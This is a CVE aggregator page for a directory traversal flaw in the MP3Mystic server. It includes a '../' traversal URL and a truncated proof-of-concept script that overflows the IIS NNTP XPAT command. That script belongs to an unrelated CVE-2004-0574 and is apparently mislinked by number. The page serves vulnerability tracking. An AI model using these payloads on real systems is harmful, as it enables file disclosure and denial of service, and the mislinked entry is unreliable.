CVE-2001-0574
published 2001-08-14CVE-2001-0574: Directory traversal vulnerability in MP3Mystic prior to 1.04b3 allows a remote attacker to download arbitrary files via a '..' (dot dot) in the URL.
PriorityP425medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
3.67%
88.3th percentile
Directory traversal vulnerability in MP3Mystic prior to 1.04b3 allows a remote attacker to download arbitrary files via a '..' (dot dot) in the URL.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jason_rahaim | mp3mystic | — | — |
| jason_rahaim | mp3mystic | — | — |
| jason_rahaim | mp3mystic | — | — |
| jason_rahaim | mp3mystic | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Windows NNTP Service (XPAT) - Denial of Service (MS04-036)
exploitdb·2004-10-16
CVE-2004-0574 Microsoft Windows NNTP Service (XPAT) - Denial of Service (MS04-036)
Microsoft Windows NNTP Service (XPAT) - Denial of Service (MS04-036)
---
#--
# IIS NNTP Service XPAT command heap overflow proof of concept
#
# Author:
# Lucas Lavarello (lucas at coresecurity dot com)
# Juliano Rizzo (juliano at coresecurity dot com)
#
# Copyright (c) 2001-2004 CORE Security Technologies, CORE SDI Inc.
# All rights reserved.
#
# THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI Inc. BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR
# CONSEQUENTIAL DAMAGES RESULTING FROM THE USE OR MISUSE OF
# THIS SOFTWARE
#
# www coresecurity com
#--
from socket import *
host = "127.0.0.1"
pat = "C"*1946 + " " + "X"*10
newsgroup = "control.newgroup"
sock = socket(AF_INET, SOCK_STREAM)
sock.con
Exploit-DB
Jason Rahaim MP3Mystic 1.0.x - Server Directory Traversal
exploitdb·2001-05-07
CVE-2001-0574 Jason Rahaim MP3Mystic 1.0.x - Server Directory Traversal
Jason Rahaim MP3Mystic 1.0.x - Server Directory Traversal
---
source: https://www.securityfocus.com/bid/2699/info
A vulnerability exists in Jason Rahaim's MP3Mystic Server which allows a remote user to traverse the directories of a target host. This may lead to the disclosure of file and directory contents. Arbitrary directories can be accessed through the inclusion of double dot '../' sequences when submitting a URL.
www.example.com/../scandisk.log
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2001-05/0046.htmlhttp://mp3mystic.com/mp3mystic/news.phtmlhttp://www.osvdb.org/1815http://www.securityfocus.com/bid/2699https://exchange.xforce.ibmcloud.com/vulnerabilities/6504http://archives.neohapsis.com/archives/bugtraq/2001-05/0046.htmlhttp://mp3mystic.com/mp3mystic/news.phtmlhttp://www.osvdb.org/1815http://www.securityfocus.com/bid/2699https://exchange.xforce.ibmcloud.com/vulnerabilities/6504
2001-08-14
Published